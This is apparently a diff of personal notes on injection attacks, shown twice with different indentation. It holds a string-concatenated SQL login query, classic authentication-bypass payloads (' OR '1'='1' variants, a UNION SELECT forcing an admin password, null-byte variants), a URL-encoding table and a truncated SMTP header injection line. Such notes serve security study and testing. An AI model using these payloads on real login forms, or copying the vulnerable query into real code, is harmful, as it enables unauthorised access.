ruevaughn · August 21, 2021 04:51
diff --git a/a1-injection b/a1-injection
 query = "SELECT * FROM users WHERE name='" + user + "' AND password='" + password + "'";
 SELECT * FROM users WHERE name='jane' AND password='x' OR '1'='1';

 - MySQL, MSSQL, Oracle, PostgreSQL, SQLite:
 OWASP TOP 10 2013-2021 #1 Vulnerability: Injection

 # SQLinjection
 ' OR '1'='1' -- ' OR '1'='1' /*

 ' UNION SELECT 'admin' AS password# Password = admin

 -- MySQL:

 ' OR '1'='1' #

 -- Access (using null characters):

 ' OR '1'='1' %00 ' OR '1'='1' %16

 # URL Encoding  
 URL Encoding 	Character
 %20 	space
 %22 	"
 %27 	'
 %28 	(
 %29 	)
 %2C 	,

 # SMTP Header Injection into name or other fields
 Joe\[email protected]
	query = "SELECT * FROM users WHERE name='" + user + "' AND password='" + password + "'";
	SELECT * FROM users WHERE name='jane' AND password='x' OR '1'='1';

	- MySQL, MSSQL, Oracle, PostgreSQL, SQLite:
	OWASP TOP 10 2013-2021 #1 Vulnerability: Injection

	# SQLinjection
	' OR '1'='1' -- ' OR '1'='1' /*

	' UNION SELECT 'admin' AS password# Password = admin

	-- MySQL:

	' OR '1'='1' #

	-- Access (using null characters):

	' OR '1'='1' %00 ' OR '1'='1' %16

	# URL Encoding
	URL Encoding Character
	%20 space
	%22 "
	%27 '
	%28 (
	%29 )
	%2C ,

	# SMTP Header Injection into name or other fields
	Joe\[email protected]